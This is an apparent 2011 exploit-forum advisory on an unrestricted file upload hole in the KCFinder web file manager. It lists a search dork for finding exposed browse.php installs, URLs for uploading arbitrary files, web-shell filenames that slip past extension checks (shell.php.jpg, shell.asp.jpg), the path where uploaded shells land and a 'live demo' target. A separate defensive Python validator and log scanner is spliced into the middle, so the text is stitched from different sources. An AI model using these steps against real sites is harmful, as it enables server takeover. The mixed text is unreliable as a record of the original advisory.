14 Jun 2011

CKSource KCFinder <= File Upload Vulnerability

=====================================================================
                      .__         .__  __            .__    .___
  ____ ___  _________ |  |   ____ |__|/  |_          |__| __| _/
_/ __ \\  \/  /\____ \|  |  /  _ \|  \   __\  ______ |  |/ __ |
\  ___/ >    < |  |_> >  |_(  <_> )  ||  |   /_____/ |  / /_/ |
 \___  >__/\_ \|   __/|____/\____/|__||__|           |__\____ |
     \/      \/|__|                                          \/
   Exploit-ID is the Exploit Information Disclosure
 
Web             : exploit-id.com
e-mail          : root[at]exploit-id[dot]com             
 
                  #########################################
               I'm Z190T, member of Exploit-Id
      #########################################
======================================================================
 
[x] Title : "CKSource KCFinder <= File Upload Vulnerability"
[x] Author : Z190T
[x] Contact : mahruz.id[at]gmail[at]com
[x] Vendor : http://kcfinder.sunhater.com/
[x] Platform : PHP and asp
[x] dork : /kcfinder/browse.php
[x] Tested on : Windows XP sp3 Ar & Linux
 
**** Notice ****
KCFinder is an alternative to the CKFinder web file manager.
It can be integrated into FCKeditor, CKEditor, and TinyMCE WYSIWYG web editors
to upload and manage images, Flash, and other files that can be embedded in an editor's generated HTML content.
 
**** Exploit Details ****
- http://[localhost]/kcfinder/browse.php
- http://[localhost]/[ketahuan]/kcfinder/browse.php
 
**** Attachment ****
- http://[localhost]/kcfinder/browse.php?type=files&dir=/ <== for any files
- http://[localhost]/kcfinder/browse.php?type=images&dir=/ <== for any images
- Shell Example : shell.php, shell.asp, shell.html, shell.php.jpg, shell.asp.jpg, or [txt] extensions!!
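The list above shows why an upload handler that checks only the last extension is not enough: a name such as shell.php.jpg carries an executable extension in the middle. The following Python is an added defensive example, not KCFinder code and not part of this advisory: it validates an upload filename against an allowlist and rejects names with more than one extension or a leading dot (e.g. .htaccess), and it scans constructed Apache-style access-log lines for POST requests to a browse.php path and for stored files under /kcfinder/upload/ whose names fail the same check. The allowlist, the log lines, the assumption that a POST to browse.php is an upload attempt, and the label strings are all assumptions made for the example.

```python
import os
import re
from urllib.parse import urlsplit

# Assumed allowlist of extensions a hardened upload handler would accept.
ALLOWED_EXTENSIONS = {"jpg", "jpeg", "png", "gif", "pdf", "txt"}

# Apache combined-log prefix: client IP, method, request target and status.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# Constructed sample log lines (not real traffic) showing a browse/upload
# sequence followed by a fetch of a double-extension file.
LOG_LINES = [
    '203.0.113.7 - - [14/Jun/2011:10:01:02 +0000] "GET /kcfinder/browse.php?type=files&dir=/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Jun/2011:10:01:09 +0000] "POST /kcfinder/browse.php?type=files&dir=/ HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '203.0.113.7 - - [14/Jun/2011:10:01:15 +0000] "GET /kcfinder/upload/files/shell.php.jpg HTTP/1.1" 200 31 "-" "Mozilla/5.0"',
    '198.51.100.4 - - [14/Jun/2011:10:02:00 +0000] "GET /index.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
]


def is_safe_upload_name(filename: str) -> bool:
    """Accept only <base>.<ext> with exactly one extension from the allowlist.

    Rejects dotfiles (.htaccess), names with multiple extensions
    (shell.php.jpg), names without an extension, and odd characters.
    Path components are stripped first so traversal prefixes are ignored.
    """
    name = os.path.basename(filename.replace("\\", "/"))
    if not name or name.startswith("."):
        return False
    parts = name.split(".")
    if len(parts) != 2:
        return False
    base, ext = parts
    if not re.fullmatch(r"[A-Za-z0-9_-]{1,64}", base):
        return False
    return ext.lower() in ALLOWED_EXTENSIONS


def find_kcfinder_activity(lines):
    """Return (ip, label) pairs for log lines worth a closer look.

    Assumption for this example: a POST to any .../kcfinder/browse.php is
    treated as an upload attempt, and any file served from
    .../kcfinder/upload/ whose name fails is_safe_upload_name is flagged.
    """
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        path = urlsplit(m["target"]).path
        if path.endswith("/kcfinder/browse.php") and m["method"] == "POST":
            hits.append((m["ip"], "upload-to-browse.php"))
        elif "/kcfinder/upload/" in path:
            stored_name = path.rsplit("/", 1)[-1]
            if not is_safe_upload_name(stored_name):
                hits.append((m["ip"], "suspicious-stored-file"))
    return hits


if __name__ == "__main__":
    for candidate in ["photo.jpg", "shell.php", "shell.php.jpg", ".htaccess"]:
        print(f"{candidate:14} -> {'allow' if is_safe_upload_name(candidate) else 'reject'}")
    for ip, label in find_kcfinder_activity(LOG_LINES):
        print(f"{ip}: {label}")
```

The validator deliberately refuses anything with two dots rather than trying to enumerate dangerous middle extensions, since web servers configured with multiple-extension handling can execute a file based on any of its extensions. The log scan is a starting point for a detection rule; in practice it would be fed the real access log and the browse.php path adjusted to where the component is actually installed.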
 
**** Preview ****
- You can see there!! "0r"
- http://[localhost]/[ketahuan]/kcfinder/upload/files/[g0 a HACK]
 
**** Live Demo ****
- http://[lagi-nyari]/js/kcfinder/browse.php
 
======================================================================
 
[ Thx TO ]
 
[x] All member of EXPLOIT-ID.com, ungu.com, THK-forumo.org, etc...
[x] friends I am proud of : haX0r.x0x, Surabaya Getar, kaMtiEz, eXeSoul, Caddy-Dz, KedAns-Dz, metasploit, KnocKout, etc...
 
======================================================================